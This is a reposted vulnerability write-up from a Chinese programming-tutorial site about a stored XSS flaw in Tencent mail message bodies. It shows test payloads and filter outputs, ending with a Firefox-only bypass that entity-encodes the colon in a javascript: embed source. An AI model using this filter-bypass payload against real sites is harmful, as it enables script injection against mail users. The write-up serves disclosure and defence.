好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

腾讯邮箱正文存储行XSS漏洞 - 网站安全 - 自学p

邮件正文的跨站脚本过滤规则不完善导致被绕过。

 

 

 

测试1:

 

<embed src="javascript:alert(3)">

 

 

结果1:

 

<embed invokeurls="false" allownetworking="none" allowscriptaccess="never" type="application/x-shockwave-flash">

 

 

 

 

尽量将测试内容最小化,找出问题根源。测试2:

 

<embed src="javascript">

 

 

结果2:

 

<embed src="javascript" invokeurls="false" allownetworking="none" allowscriptaccess="never" type="application/x-shockwave-flash"></div>

 

 

 

 

确定伪协议后面的":"触发了过滤规则。实体编码之。测试3:

 

<embed src="javascript&colon;alert(2)">

 

 

结果3:

 

<embed src="javascript:alert(2)" invokeurls="false" allownetworking="none" allowscriptaccess="never" type="application/x-shockwave-flash">

 

 

 

 

PS:该XSS Vector仅在Firefox下有效

 

 

 

 

修复方案:

完善过滤规则

查看更多关于腾讯邮箱正文存储行XSS漏洞 - 网站安全 - 自学p的详细内容...

  阅读:88次